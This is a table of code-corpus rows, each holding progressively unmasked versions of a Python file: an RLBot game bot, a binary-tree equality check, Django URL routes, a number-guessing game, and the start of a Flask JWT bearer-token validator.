| index (int64, 0–10k) | blob_id (string, 40–40 chars) | step-1 (string, 13–984k chars) | step-2 (string, 6–1.23M chars, ⌀) | step-3 (string, 15–1.34M chars, ⌀) | step-4 (string, 30–1.34M chars, ⌀) | step-5 (string, 64–1.2M chars, ⌀) | step-ids (sequence, 1–5 items) |
|---|---|---|---|---|---|---|---|
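The header above is the dataset-viewer column summary: an `index` (int64, 0–10k), a 40-character `blob_id`, five `step-*` string columns holding progressively less-masked code (⌀ marks null cells), and a `step-ids` sequence of one to five integers. A minimal sketch of how such a table could be inspected with the Hugging Face `datasets` library; the dataset path `user/masked-code-steps` is a hypothetical placeholder, not this dataset's real identifier.

```python
from datasets import load_dataset

ds = load_dataset("user/masked-code-steps", split="train")  # hypothetical path
row = ds[600]
print(row["blob_id"], row["step-ids"])
for key in ("step-1", "step-2", "step-3", "step-4", "step-5"):
    cell = row[key]
    # Null (⌀) cells come back as None; populated cells hold code with <mask token> gaps.
    print(key, "null" if cell is None else f"{len(cell)} chars")
```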
600 | 1a0d4e77f09b4ce752631ae36a83ff57f96b89b1 | <mask token>
class MyBot(BaseAgent):
<mask token>
def initialize_agent(self):
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
    def get_output(self, packet: GameTickPacket) -> SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
self.boost_pad_tracker.update_boost_status(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1,
f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1,
1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action,
kickoff):
self.action = kickoff(self.car.loc)
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
if controls is not None:
return controls
elif self.action.done:
print('choosing new action')
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
ball_prediction = self.get_ball_prediction_struct()
            ball_in_future = find_slice_at_time(ball_prediction, packet.game_info.seconds_elapsed + 2)
            target_location = Vec3(ball_in_future.physics.location)
            self.renderer.draw_line_3d(ball_location, target_location, self.renderer.cyan())
else:
target_location = ball_location
"""
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
"""
print('the fuck we doin here?!?!?!?')
return controls
def begin_front_flip(self, packet):
        self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection.Information_IGotIt)
        self.action = Sequence([
            ControlStep(duration=0.05, controls=SimpleControllerState(jump=True)),
            ControlStep(duration=0.05, controls=SimpleControllerState(jump=False)),
            ControlStep(duration=0.2, controls=SimpleControllerState(jump=True, pitch=-1)),
            ControlStep(duration=0.8, controls=SimpleControllerState()),
        ])
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
        return ball_location.flat() == kickoff_location and ball_velocity.length() == 0
<mask token>
| <mask token>
class MyBot(BaseAgent):
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.action: Action = kickoff
self.info: GameInfo = None
self.car: Car = None
self.boost_pad_tracker = BoostPadTracker()
        self.strat: Strategy = None
self.action: Action = None
def initialize_agent(self):
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
    def get_output(self, packet: GameTickPacket) -> SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
self.boost_pad_tracker.update_boost_status(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1,
f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1,
1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action,
kickoff):
self.action = kickoff(self.car.loc)
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
if controls is not None:
return controls
elif self.action.done:
print('choosing new action')
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
ball_prediction = self.get_ball_prediction_struct()
            ball_in_future = find_slice_at_time(ball_prediction, packet.game_info.seconds_elapsed + 2)
            target_location = Vec3(ball_in_future.physics.location)
            self.renderer.draw_line_3d(ball_location, target_location, self.renderer.cyan())
else:
target_location = ball_location
"""
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
"""
print('the fuck we doin here?!?!?!?')
return controls
def begin_front_flip(self, packet):
        self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection.Information_IGotIt)
        self.action = Sequence([
            ControlStep(duration=0.05, controls=SimpleControllerState(jump=True)),
            ControlStep(duration=0.05, controls=SimpleControllerState(jump=False)),
            ControlStep(duration=0.2, controls=SimpleControllerState(jump=True, pitch=-1)),
            ControlStep(duration=0.8, controls=SimpleControllerState()),
        ])
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
        return ball_location.flat() == kickoff_location and ball_velocity.length() == 0
<mask token>
| <mask token>
kickoff_location = Vec3(0, 0, 0)
class MyBot(BaseAgent):
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.action: Action = kickoff
self.info: GameInfo = None
self.car: Car = None
self.boost_pad_tracker = BoostPadTracker()
        self.strat: Strategy = None
self.action: Action = None
def initialize_agent(self):
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
    def get_output(self, packet: GameTickPacket) -> SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
self.boost_pad_tracker.update_boost_status(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1,
f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1,
1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action,
kickoff):
self.action = kickoff(self.car.loc)
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
if controls is not None:
return controls
elif self.action.done:
print('choosing new action')
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
ball_prediction = self.get_ball_prediction_struct()
            ball_in_future = find_slice_at_time(ball_prediction, packet.game_info.seconds_elapsed + 2)
            target_location = Vec3(ball_in_future.physics.location)
            self.renderer.draw_line_3d(ball_location, target_location, self.renderer.cyan())
else:
target_location = ball_location
"""
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
"""
print('the fuck we doin here?!?!?!?')
return controls
def begin_front_flip(self, packet):
        self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection.Information_IGotIt)
        self.action = Sequence([
            ControlStep(duration=0.05, controls=SimpleControllerState(jump=True)),
            ControlStep(duration=0.05, controls=SimpleControllerState(jump=False)),
            ControlStep(duration=0.2, controls=SimpleControllerState(jump=True, pitch=-1)),
            ControlStep(duration=0.8, controls=SimpleControllerState()),
        ])
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
        return ball_location.flat() == kickoff_location and ball_velocity.length() == 0
<mask token>
| from rlbot.agents.base_agent import BaseAgent, GameTickPacket, SimpleControllerState
from Decisions.challengeGame import ChallengeGame
from Decisions.info import MyInfo, Car
from Decisions.strat import Strategy
from Drawing.Drawing import DrawingTool
from util.vec import Vec3
from Actions.Kickoff import kickoff
from Actions.Chase import chase
from rlbot.messages.flat.QuickChatSelection import QuickChatSelection
from rlbot.utils.structures.game_data_struct import GameTickPacket
from util.ball_prediction_analysis import find_slice_at_time
from util.boost_pad_tracker import BoostPadTracker
from util.drive import steer_toward_target
from util.sequence import Sequence, ControlStep
from util.vec import Vec3
import math
import time
from math import radians
kickoff_location = Vec3(0, 0, 0)
class MyBot(BaseAgent):
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.action: Action = kickoff
self.info: GameInfo = None
self.car: Car = None
self.boost_pad_tracker = BoostPadTracker()
        self.strat: Strategy = None
self.action: Action = None
def initialize_agent(self):
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
    def get_output(self, packet: GameTickPacket) -> SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
self.boost_pad_tracker.update_boost_status(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1,
f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1,
1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action,
kickoff):
self.action = kickoff(self.car.loc)
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
if controls is not None:
return controls
elif self.action.done:
print('choosing new action')
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
ball_prediction = self.get_ball_prediction_struct()
            ball_in_future = find_slice_at_time(ball_prediction, packet.game_info.seconds_elapsed + 2)
            target_location = Vec3(ball_in_future.physics.location)
            self.renderer.draw_line_3d(ball_location, target_location, self.renderer.cyan())
else:
target_location = ball_location
"""
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
"""
print('the fuck we doin here?!?!?!?')
return controls
def begin_front_flip(self, packet):
        self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection.Information_IGotIt)
        self.action = Sequence([
            ControlStep(duration=0.05, controls=SimpleControllerState(jump=True)),
            ControlStep(duration=0.05, controls=SimpleControllerState(jump=False)),
            ControlStep(duration=0.2, controls=SimpleControllerState(jump=True, pitch=-1)),
            ControlStep(duration=0.8, controls=SimpleControllerState()),
        ])
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
        return ball_location.flat() == kickoff_location and ball_velocity.length() == 0
<mask token>
| from rlbot.agents.base_agent import BaseAgent, GameTickPacket, SimpleControllerState
#from rlbot.utils.structures.game_data_struct import GameTickPacket
from Decisions.challengeGame import ChallengeGame
from Decisions.info import MyInfo, Car
from Decisions.strat import Strategy
from Drawing.Drawing import DrawingTool
from util.vec import Vec3
from Actions.Kickoff import kickoff
from Actions.Chase import chase
# Blue team's (0) goal is located at (0, -5120)
# Orange (1) at (0, 5120)
# ball R = 92
from rlbot.messages.flat.QuickChatSelection import QuickChatSelection
from rlbot.utils.structures.game_data_struct import GameTickPacket
from util.ball_prediction_analysis import find_slice_at_time
from util.boost_pad_tracker import BoostPadTracker
from util.drive import steer_toward_target
from util.sequence import Sequence, ControlStep
from util.vec import Vec3
import math
import time
from math import radians
kickoff_location = Vec3(0, 0, 0)
class MyBot(BaseAgent):
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.action: Action = kickoff
self.info : GameInfo = None
self.car : Car = None
self.boost_pad_tracker = BoostPadTracker()
        self.strat: Strategy = None
self.action : Action = None
def initialize_agent(self):
# Set up information about the boost pads now that the game is active and the info is available
self.boost_pad_tracker.initialize_boosts(self.get_field_info())
self.info = MyInfo(self.team, self.index)
self.strat = Strategy(self.info)
self.car = Car()
def get_output(self, packet: GameTickPacket) -> SimpleControllerState:
"""
This function will be called by the framework many times per second. This is where you can
see the motion of the ball, etc. and return controls to drive your car.
"""
# Keep our boost pad info updated with which pads are currently active
self.boost_pad_tracker.update_boost_status(packet)
#self.info = self.info.read_packet(packet)
self.car.updateCar(packet, self.index)
self.info.read_packet(packet, self.get_ball_prediction_struct().slices)
#print("in main target: {}".format(self.get_ball_prediction_struct().slices[0].physics.location))
#self.renderer.draw_line_3d(self.car.loc, target_location, self.renderer.white())
#self.renderer.draw_rect_3d(target_location, 8, 8, True, self.renderer.cyan(), centered=True)
#cg = ChallengeGame(self.car, bp_struct)
#print(cg.get_time_to_loc(cg.challenge_loc))
# This is good to keep at the beginning of get_output. It will allow you to continue
# any sequences that you may have started during a previous call to get_output.
if self.action is None:
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
print(controls.steer)
return controls
self.renderer.draw_string_3d(self.car.loc, 1, 1, f'Speed: {self.car.vel.length():.1f}', self.renderer.white())
if self.action.name:
self.renderer.draw_string_3d(self.car.loc + Vec3(0, 0, 20), 1, 1, self.action.name, self.renderer.white())
if packet.game_info.is_kickoff_pause and not isinstance(self.action, kickoff):
#self.logger.info(self.action)
self.action = kickoff(self.car.loc)
#print("Sequence is: {}".format(self.action))
#print("Sequence finished: {}".format(self.action.done))
controls = self.action.tick(self.info)
return controls
if self.action and not self.action.done:
controls = self.action.tick(self.info)
#print("action is: {}".format(self.action.name))
if controls is not None:
return controls
elif self.action.done:
print("choosing new action")
self.action = self.strat.chooseAction(self.info)
controls = self.action.tick(self.info)
return controls
# Gather some information about our car and the ball
ball_location = Vec3(packet.game_ball.physics.location)
if self.car.loc.dist(ball_location) > 1500:
# We're far away from the ball, let's try to lead it a little bit
ball_prediction = self.get_ball_prediction_struct() # This can predict bounces, etc
ball_in_future = find_slice_at_time(ball_prediction, packet.game_info.seconds_elapsed + 2)
target_location = Vec3(ball_in_future.physics.location)
self.renderer.draw_line_3d(ball_location, target_location, self.renderer.cyan())
else:
target_location = ball_location
# Draw some things to help understand what the bot is thinking
#self.renderer.draw_string_2d(100, 100, 1, 1, f'Ball at: {ball_location}', self.renderer.white())
'''
if 750 < self.car.vel.length() < 800:
# We'll do a front flip if the car is moving at a certain speed.
return self.begin_front_flip(packet)
#controls = self.action.controls
controls = SimpleControllerState()
controls.steer = steer_toward_target(self.car, target_location)
controls.throttle = 1.0
# You can set more controls if you want, like controls.boost.
'''
print("the fuck we doin here?!?!?!?")
return controls
def begin_front_flip(self, packet):
# Send some quickchat just for fun
self.send_quick_chat(team_only=False, quick_chat=QuickChatSelection.Information_IGotIt)
# Do a front flip. We will be committed to this for a few seconds and the bot will ignore other
# logic during that time because we are setting the action.
self.action = Sequence([
ControlStep(duration=0.05, controls=SimpleControllerState(jump=True)),
ControlStep(duration=0.05, controls=SimpleControllerState(jump=False)),
ControlStep(duration=0.2, controls=SimpleControllerState(jump=True, pitch=-1)),
ControlStep(duration=0.8, controls=SimpleControllerState()),
])
# Return the controls associated with the beginning of the sequence so we can start right away.
return self.action.tick(packet)
def is_kickoff(self, ball_location, ball_velocity):
#self.logger.info(ball_location.flat() == kickoff_location)
#self.logger.info(ball_velocity.length() == 0)
return ball_location.flat() == kickoff_location and ball_velocity.length() == 0
'''
class Bot(BaseAgent):
DEVMODE = True
def __init__(self, name, team, index):
super().__init__(name, team, index)
self.info: GameInfo = None
self.draw: DrawingTool = None
self.strat: Strategy = None
self.car = None
self.Actions: Maneuver = None
self.controls: SimpleControllerState = SimpleControllerState()
def initialize_agent(self):
#self.logger.info(rlutilities.__file__)
self.info = GameInfo(self.team)
#for field in self.info._fields_:
# print(field[0], getattr(self.info, field[0]))
self.info.set_mode("soccar")
self.draw = DrawingTool(self.renderer)
self.car = self.info.cars[self.index]
self.logger.info("my index is {}".format(self.index))
self.strat = Strategy(self.info, my_car)
def get_output(self, packet: GameTickPacket):
# Update game data variables
if self.tick_counter < 20:
self.tick_counter += 1
return Input()
if self.Actions is None and not self.Actions.finished:
controls = self.Action.tick(packet)
self.info.read_packet(packet, self.get_field_info(), self.get_ball_path())
self.draw.draw_path(self.get_ball_path())
challenge = ChallengeGame(self.info.cars[self.index], self.info.ball_path)
if challenge.should_go:
self.Action = self.strat.chooseAction(challenge, self.info.ball_path)
self.controls = self.Action.controls
print(self.Action)
if self.info.is_kickoff():
return self.do
self.controls = self.action.doThing(self.info)
if self.DEVMODE:
self.Action.render(self.draw)
challenge.render(self.draw)
return self.controls
def get_ball_path(self):
ball_prediction = self.get_ball_prediction_struct()
path = []
for i in range(0, ball_prediction.num_slices):
prediction_slice = ball_prediction.slices[i]
loc = prediction_slice.physics.location
path.append(loc)
return path
''' | [
5,
6,
7,
8,
9
] |
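Row 600's bot delegates steering to `util.drive.steer_toward_target`, which is imported but never shown. A stand-alone sketch of that kind of helper, assuming only a 2D car position and yaw; the 2.5 turn gain and the tuple-based vectors are illustrative choices, not RLBot's actual implementation.

```python
import math

def steer_toward_target(car_loc, car_yaw, target):
    """Map the relative angle to the target into a [-1, 1] steer value."""
    angle_to_target = math.atan2(target[1] - car_loc[1], target[0] - car_loc[0])
    # Wrap the difference into (-pi, pi] so the car always turns the short way.
    angle = (angle_to_target - car_yaw + math.pi) % (2 * math.pi) - math.pi
    return max(-1.0, min(1.0, 2.5 * angle))

print(steer_toward_target((0.0, 0.0), 0.0, (1000.0, 1000.0)))  # 1.0: full turn toward the target
```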
601 | 4a0eca90de3ce7fb0ab6decb0ec6aadb32c1a9fa | <mask token>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
        return (rootA.val == rootB.val and self.solution(rootA.left, rootB.left)
                and self.solution(rootA.right, rootB.right))
<mask token>
| <mask token>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
        return (rootA.val == rootB.val and self.solution(rootA.left, rootB.left)
                and self.solution(rootA.right, rootB.right))
<mask token>
A.insert(100)
A.insert(102)
A.insert(96)
<mask token>
B.insert(100)
B.insert(102)
B.insert(96)
<mask token>
print(res)
| <mask token>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
        return (rootA.val == rootB.val and self.solution(rootA.left, rootB.left)
                and self.solution(rootA.right, rootB.right))
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
| from Level6.Trees.BinaryTree import BinaryTree
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
        return (rootA.val == rootB.val and self.solution(rootA.left, rootB.left)
                and self.solution(rootA.right, rootB.right))
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
| # Given two binary trees, write a function to check if they are equal or not.
#
# Two binary trees are considered equal if they are structurally identical and the nodes have the same value.
#
# Return 0 / 1 ( 0 for false, 1 for true ) for this problem
#
# Example :
#
# Input :
#
# 1 1
# / \ / \
# 2 3 2 3
#
# Output :
# 1 or True
from Level6.Trees.BinaryTree import BinaryTree
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
# if rootA is None and rootB is None:
# return True
return ((rootA.val == rootB.val) and self.solution(rootA.left, rootB.left) and
self.solution(rootA.right, rootB.right))
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
| [
2,
3,
4,
5,
6
] |
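Row 601's recursive check can hit Python's recursion limit on deep trees. An iterative sketch of the same comparison; the `BinaryTree` class from `Level6.Trees` is not shown, so a hypothetical minimal `Node` stands in for it.

```python
from collections import deque

class Node:
    def __init__(self, val, left=None, right=None):  # hypothetical stand-in node
        self.val, self.left, self.right = val, left, right

def same_tree(a, b):
    """Breadth-first version of the recursive equality check above."""
    queue = deque([(a, b)])
    while queue:
        x, y = queue.popleft()
        if x is None and y is None:
            continue  # both branches end here: still equal
        if x is None or y is None or x.val != y.val:
            return False
        queue.append((x.left, y.left))
        queue.append((x.right, y.right))
    return True

print(same_tree(Node(100, Node(96), Node(102)), Node(100, Node(96), Node(102))))  # True
```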
602 | 0c1de2c1eb5a4de7aeb14ad6b27aa61e07bc4c51 | <mask token>
| <mask token>
app_name = 'trees'
urlpatterns = [
    path('list/', TreeListView.as_view(), name='list'),
    path('create/', TreeCreateView.as_view(), name='create'),
    path('<int:pk>/update/', TreeUpdateView.as_view(), name='update'),
]
| from django.urls import path
from .views import TreeCreateView, TreeListView, TreeUpdateView
app_name = 'trees'
urlpatterns = [
    path('list/', TreeListView.as_view(), name='list'),
    path('create/', TreeCreateView.as_view(), name='create'),
    path('<int:pk>/update/', TreeUpdateView.as_view(), name='update'),
]
| from django.urls import path
from .views import (
TreeCreateView,
TreeListView,
TreeUpdateView,
)
app_name = 'trees'
urlpatterns = [
path('list/', TreeListView.as_view(),
name='list'),
path('create/', TreeCreateView.as_view(),
name='create'),
    path('<int:pk>/update/', TreeUpdateView.as_view(),
name='update'),
]
| null | [
0,
1,
2,
3
] |
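Row 602 only shows `urls.py`; the three views it imports from `.views` are not in the row. A plausible `views.py` counterpart, assuming a `Tree` model with a single `name` field (both are assumptions, since neither appears in the source).

```python
from django.urls import reverse_lazy
from django.views.generic import CreateView, ListView, UpdateView

from .models import Tree  # hypothetical model


class TreeListView(ListView):
    model = Tree


class TreeCreateView(CreateView):
    model = Tree
    fields = ['name']  # hypothetical field
    success_url = reverse_lazy('trees:list')


class TreeUpdateView(UpdateView):
    model = Tree
    fields = ['name']
    success_url = reverse_lazy('trees:list')
```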
603 | 42d03aabef7d75c813f30bb6d8a835d76fd1fc83 | <mask token>
| <mask token>
print(' Guess a number between 0 and 100')
<mask token>
while condition != 1:
counter += 1
if condition == 0:
last = middle
elif condition == 2:
start = middle
middle = int((start + last) / 2)
condition = int(input('Is your guess ' + str(middle) +
"? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "
))
print('It took us {} guesses to get it right! Cheers!'.format(counter))
| start = 0
last = 100
middle = 50
counter = 1
print(' Guess a number between 0 and 100')
condition = int(input('Is your guess ' + str(middle) +
"? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "
))
while condition != 1:
counter += 1
if condition == 0:
last = middle
elif condition == 2:
start = middle
middle = int((start + last) / 2)
condition = int(input('Is your guess ' + str(middle) +
"? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "
))
print('It took us {} guesses to get it right! Cheers!'.format(counter))
| start=0
last=100
middle=50
counter=1
print(" Guess a number between 0 and 100")
condition = int(input("Is your guess " + str(middle) + "? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "))
while condition != 1:
counter += 1
if condition == 0:
last = middle
elif condition == 2:
start = middle
middle=int((start+last)/2)
condition = int(input("Is your guess " + str(middle) + "? (0 means it's too low, 1 means it's your guess and 2 means it's too high) "))
print("It took us {} guesses to get it right! Cheers!".format(counter))
| null | [
0,
1,
2,
3
] |
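Row 603 is interactive, so its bisection is easiest to verify by simulating the user's replies for a fixed secret, as in this sketch. Replies 0 and 2 map to lowering the upper bound or raising the lower bound exactly as in the loop above; over secrets 0–99 the guess count never exceeds 7 (about log2 of 100).

```python
def guesses_needed(secret, start=0, last=100):
    middle, counter = 50, 1
    while middle != secret:
        counter += 1
        if secret < middle:   # the user would answer 0: the number is lower
            last = middle
        else:                 # the user would answer 2: the number is higher
            start = middle
        middle = (start + last) // 2
    return counter

print(max(guesses_needed(n) for n in range(100)))  # 7
```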
604 | 97d4387c7bfd141b5a7019b221adb550105d4351 | <mask token>
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
        is_blacklisted_token = BlacklistToken.check_blacklist(self.access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
    def from_authorization_header(authorization_header: str, app_context: AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
<mask token>
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
<mask token>
| <mask token>
class AuthenticationError(ValueError):
pass
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
        is_blacklisted_token = BlacklistToken.check_blacklist(self.access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
    def from_authorization_header(authorization_header: str, app_context: AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
<mask token>
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
<mask token>
def issue_token_for_user(user: User):
    access_token = new_token({
        'iss': 'lorem.ipsum.dev',
        'aud': 'lorem.ipsum.auth',
        'sub': user.username,
        'email': user.email,
        'roles': [user.role.name],
        'exp': datetime.datetime.now(tz=datetime.timezone.utc) + datetime.timedelta(hours=4),
        'iat': datetime.datetime.now(tz=datetime.timezone.utc)})
return access_token
| <mask token>
def app_context():
if 'app_context' not in g:
g.app_context = lorem_ipsum.create_app_context()
return g.app_context
@lru_cache()
def get_jwk():
LOGGER.debug('Loading jwk from public key...')
key_data = None
with open(app_context().config['jwk_public_key_path'], 'rb') as _key_file:
key_data = _key_file.read()
LOGGER.debug(key_data)
key = JsonWebKey.import_key(key_data, {'kty': 'RSA'})
_jwks = {'keys': [{**key.as_dict(), 'kid': 'demo_key'}]}
LOGGER.debug(_jwks)
return _jwks
class AuthenticationError(ValueError):
pass
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
